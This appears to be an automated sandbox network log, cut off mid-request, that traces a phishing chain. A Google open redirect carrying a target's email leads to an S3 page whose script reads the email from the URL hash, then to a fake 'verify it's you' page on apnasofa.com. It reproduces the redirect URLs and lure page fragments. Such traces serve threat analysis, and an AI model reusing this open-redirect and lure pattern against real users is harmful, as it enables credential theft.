                              Date: Fri, 29 Nov 2024 14:58:19 GMT
                              Expires: Sun, 29 Dec 2024 14:58:19 GMT
                              Cache-Control: public, max-age=2592000
                              Server: gws
                              Content-Length: 342
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-11-29 14:58:19 UTC342INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 75 72 6c 3f 71 3d 65 72 6e 69 65 2e 67 72 75 65 40 6e 61 74 69 6f 6e 61 6c 6d 69 2e 63 6f 6d 26 61 6d 70 3b 6e 61 74 69 6f 6e 61 6c 6d 69 2e 63 6f 6d 3d 26 61 6d 70 3b 73 61 3d 74 26 61 6d 70 3b
                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.lk/url?q=ernie.grue@nationalmi.com&amp;nationalmi.com=&amp;sa=t&amp;


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.4497422.19.202.23443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:20 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              Accept-Encoding: identity
                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                              Range: bytes=0-2147483646
                              User-Agent: Microsoft BITS/7.8
                              Host: fs.microsoft.com
                              2024-11-29 14:58:20 UTC487INHTTP/1.1 200 OK
                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                              Content-Type: application/octet-stream
                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                              Server: ECAcc (lpl/EF06)
                              X-CID: 11
                              X-Ms-ApiVersion: Distribute 1.2
                              X-Ms-Region: prod-weu-z1
                              Cache-Control: public, max-age=188228
                              Date: Fri, 29 Nov 2024 14:58:20 GMT
                              Content-Length: 55
                              Connection: close
                              X-CID: 2
                              2024-11-29 14:58:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449743172.217.19.2274435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:21 UTC904OUTGET /url?q=ernie.grue@nationalmi.com&nationalmi.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                              Host: www.google.lk
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:22 UTC1036INHTTP/1.1 302 Found
                              Location: https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                              Cache-Control: private
                              Content-Type: text/html; charset=UTF-8
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-UpfP-CYuIG4XcMuPF_wH0A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                              Permissions-Policy: unload=()
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Date: Fri, 29 Nov 2024 14:58:22 GMT
                              Server: gws
                              Content-Length: 273
                              X-XSS-Protection: 0
                              Set-Cookie: NID=519=eL4v72nRf-ZMiNTC9-v4vpDW4px2Sd0CWOHdY9RfG09G625Oa2CDFL6D_BjhzLwqk4bDWIH2-RyUJwO_hHgjTJ4nXyu8ym1NL2CsZyyGWp_EyjNPRu3IqHID88joK66DGbEvknlDPKld8WzghtPz52dW4qC3w_rGK3fkyeUjiHTRMJBMUqsREmzNXZLmrN3B_5aY1g; expires=Sat, 31-May-2025 14:58:22 GMT; path=/; domain=.google.lk; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-11-29 14:58:22 UTC273INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 6c 6b 2f 61 6d 70 2f 73 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e
                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.449744172.217.19.2274435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:24 UTC1063OUTGET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1
                              Host: www.google.lk
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: NID=519=eL4v72nRf-ZMiNTC9-v4vpDW4px2Sd0CWOHdY9RfG09G625Oa2CDFL6D_BjhzLwqk4bDWIH2-RyUJwO_hHgjTJ4nXyu8ym1NL2CsZyyGWp_EyjNPRu3IqHID88joK66DGbEvknlDPKld8WzghtPz52dW4qC3w_rGK3fkyeUjiHTRMJBMUqsREmzNXZLmrN3B_5aY1g
                              2024-11-29 14:58:25 UTC825INHTTP/1.1 302 Found
                              Location: https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
                              Cache-Control: private
                              X-Robots-Tag: noindex
                              Content-Type: text/html; charset=UTF-8
                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-nhQKuI5AP7J0FI1jaIKm2g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                              Permissions-Policy: unload=()
                              Date: Fri, 29 Nov 2024 14:58:25 GMT
                              Server: gws
                              Content-Length: 253
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close
                              2024-11-29 14:58:25 UTC253INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 69 2d 2d 69 79 2e 73 33 2e 75 73 2d 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 76 6f 63 61 62 75 6c 61 72 79 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                              Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html">here</A>.</BODY></HTML>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.44974520.12.23.50443
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:26 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+MLZTbWPXAT4rRz&MD=6BwShcOh HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                              Host: slscr.update.microsoft.com
                              2024-11-29 14:58:27 UTC560INHTTP/1.1 200 OK
                              Cache-Control: no-cache
                              Pragma: no-cache
                              Content-Type: application/octet-stream
                              Expires: -1
                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                              MS-CorrelationId: 9a106bd3-ac41-4ad2-84e0-fe75d55b80de
                              MS-RequestId: f64ab4d4-81cc-4d14-a97d-2cba91343686
                              MS-CV: MIYbB0eblk6QLG5Y.0
                              X-Microsoft-SLSClientCache: 2880
                              Content-Disposition: attachment; filename=environment.cab
                              X-Content-Type-Options: nosniff
                              Date: Fri, 29 Nov 2024 14:58:26 GMT
                              Connection: close
                              Content-Length: 24490
                              2024-11-29 14:58:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                              2024-11-29 14:58:27 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.44974752.217.132.1464435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:28 UTC690OUTGET /vocabulary.html HTTP/1.1
                              Host: i--iy.s3.us-east-1.amazonaws.com
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:28 UTC413INHTTP/1.1 200 OK
                              x-amz-id-2: JnzMOyK6PBKzLDwbIzz62tVz1kkX7fZjRBSG8weiPwFrUIbOoBlfdn67zIkV9Yfah8nf3c1uqFo=
                              x-amz-request-id: 1QNZ0F71KVTWY0P6
                              Date: Fri, 29 Nov 2024 14:58:29 GMT
                              Last-Modified: Thu, 28 Nov 2024 20:19:57 GMT
                              ETag: "495735a2f76daba1413c4e6e2f30911b"
                              x-amz-server-side-encryption: AES256
                              Accept-Ranges: bytes
                              Content-Type: text/html
                              Content-Length: 442
                              Server: AmazonS3
                              Connection: close
                              2024-11-29 14:58:28 UTC442INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 47 65 74 20 74 68 65 20 65 6e 63 6f 64 65 64 20 65 6d 61 69 6c 20 70 61 72 61 6d 65 74 65 72 20 66 72 6f 6d 20 74 68 65 20 55 52 4c 20 68 61 73 68 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6d 61 69 6c 45 6e 63 6f 64 65 64 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 20 2f 2f 20 52 65 6d 6f 76 65 20 74 68 65 20 66 69 72 73 74 20 63 68 61 72 61 63 74 65 72 20 27 23 27 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65
                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <script> // Get the encoded email parameter from the URL hash var emailEncoded = window.location.hash.substring(1); // Remove the first character '#' // Redire


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.449750103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:30 UTC706OUTGET /episode/index HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-Dest: document
                              Referer: https://i--iy.s3.us-east-1.amazonaws.com/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:31 UTC1028INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=2592000
                              expires: Sun, 29 Dec 2024 14:58:31 GMT
                              content-type: text/html
                              last-modified: Thu, 28 Nov 2024 09:22:09 GMT
                              accept-ranges: bytes
                              content-length: 1471
                              date: Fri, 29 Nov 2024 14:58:31 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:31 UTC340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 6c 65 61 73 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22
                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>pleased</title> <link rel="stylesheet" href="style.css"></head><body> <div class="container"
                              2024-11-29 14:58:31 UTC1131INData Raw: 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 2f 6c 6f 67 6f 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 57 65 20 6e 65 65 64 20 74 6f 20 76 65 72 69 66 79 20 69 74 27 73 20 79 6f 75 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6d 61 69 6c 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                              Data Ascii: tainer"> <img src="image/logo.png" class="logo" alt="Logo"> </div> <div class="header"> We need to verify it's you </div> <div class="email-container"> <div


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.449751103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:31 UTC553OUTGET /episode/style.css HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://apnasofa.com/episode/index
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:32 UTC1027INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=2592000
                              expires: Sun, 29 Dec 2024 14:58:31 GMT
                              content-type: text/css
                              last-modified: Thu, 28 Nov 2024 13:58:47 GMT
                              accept-ranges: bytes
                              content-length: 3703
                              date: Fri, 29 Nov 2024 14:58:31 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:32 UTC341INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 41 46 41 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 20 20 20
                              Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { background-color: #FFFAFA; font-family: 'Segoe UI', Arial, sans-serif; line-height: 1.6; color: #333;}.container { max-width: 800px; margin: 40px auto;
                              2024-11-29 14:58:32 UTC3362INData Raw: 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 7d 0a 0a 2f 2a 20 4c 6f 67 6f 20 53 74 79 6c 65 73 20 2a 2f 0a 2e 6c 6f 67 6f 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 7d 0a 0a 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 36 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20
                              Data Ascii: px rgba(0, 0, 0, 0.1);}/* Logo Styles */.logo-container { text-align: center; margin-bottom: 20px; padding: 10px;}.logo { max-width: 160px; height: auto; margin: 0 auto;}.verification-section { text-align: center;


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.449754103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:33 UTC604OUTGET /episode/image/logo.png HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
